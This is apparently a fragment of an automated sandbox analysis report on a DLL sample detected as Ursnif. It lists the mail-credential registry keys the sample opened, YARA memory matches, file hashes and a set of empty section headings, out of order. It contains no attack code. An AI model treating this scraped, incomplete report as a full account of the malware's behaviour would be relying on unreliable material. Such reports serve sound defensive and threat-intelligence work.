Tries to steal Mail credentials (via file access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000002.532393287.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346665065.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346762135.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346591933.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346712408.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.490922654.000001ED55336000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346417089.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.405016881.000000000572C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.696291358.0000021913236000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346784908.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346795149.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.465913433.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346535972.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.705764448.0000000004E16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.490298727.0000000000916000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5548, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4724, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6712, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4540, type: MEMORY

ID:	330591
Product:	CloudBasic
Start time:	11:08:17
Start date:	15.12.2020
Sample:	5fd885c499439tar.dll
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	dde0277221cabab1df0e1cccf6a125b2
SHA1:	a7d375672ae47f087185c78a444487aa656c8eb5
SHA256:	0fb4779661fe23fdcd79c77fc74e721b637b496abe2eb26da28d12055af7b458
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Analysis Report 5fd885c499439tar.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs